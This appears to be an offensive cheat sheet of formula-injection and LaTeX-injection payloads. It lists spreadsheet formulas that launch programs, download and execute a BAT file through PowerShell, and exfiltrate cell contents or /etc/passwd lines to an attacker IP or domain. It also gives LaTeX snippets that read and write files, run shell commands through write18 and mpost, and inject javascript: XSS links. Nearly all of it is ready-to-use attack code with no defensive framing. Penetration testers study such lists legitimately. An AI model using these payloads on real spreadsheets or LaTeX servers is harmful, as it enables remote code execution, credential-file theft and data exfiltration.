CSV/XLSX/Doc/Latex formula injection

XLSX/CSV - Formula injction

Formula	Description
=cmd|' /C calc'!xxx	Launch calc.exe
=HYPERLINK("https://www.google.com/","here")	Link to https://www.google.com/
=cmd|’/C powershell iex(wget "<server/m.bat>" -OutFile "C:/m.bat"); "C:/m.bat"’!A0	Download a BAT file and execute it
=WEBSERVICE("https://example.com/?data="&A1)	Data exfiltration of spreadsheet content
=ENCODEURL(A1)	Data exfiltration of spreadsheet content

LibreOffice Calc - Local File Inclusion (LFI)

Formula	Description
='file:///etc/passwd'#$passwd.A1	Read first line of /etc/passwd
=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))	Send read data to attacker server
=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))	Exfiltrate more than one line
=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))	Send data via DNS queries

Google Sheets — Out-of-Band (OOB) Data Exfiltration

Formula	Description
=CONCATENATE(A2:E2)	Append strings
=IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")	Import structured data
=IMPORTFEED(CONCAT("http://<attacker IP:Port>//123.txt?v=", CONCATENATE(A2:E2)))	Import RSS / ATOM feeds
=IMPORTHTML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)	Import HTML tables or lists
=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")	Import data from another sheet
=IMAGE("https://<attacker IP:Port>/images/srpr/logo3w.png")	Load remote image

LaTeX Injection

The most common solution to convert LATEX files to PDF files on servers is pdflatex.

This program uses 3 main attributes to (dis)allow command execution:

Flag	Behavior
--no-shell-escape	Disable \write18{command}
--shell-restricted	Allow only predefined commands
--shell-escape	Allow arbitrary command execution

Read File

Formula	Technique
\input{/etc/passwd}	Input file
\include{password}	Include .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}	List file content
\verbatiminput{/etc/passwd}	Verbatim read

Read Single-Line File

\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file

Read Multi-Line File

\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline
    \text{\fileline}
\repeat
\closein\file

Write File

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

LaTeX — Command Execution

\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}

If you get any LaTex error, consider using base64 to get the result without bad characters

\immediate\write18{env | base64 > test.tex}
\input{text.tex}

\input|ls|base4
\input{|"/bin/hostname"}

Cross Site Scripting (XSS)

\url{javascript:alert(1)}

\href{javascript:alert(1)}{placeholder}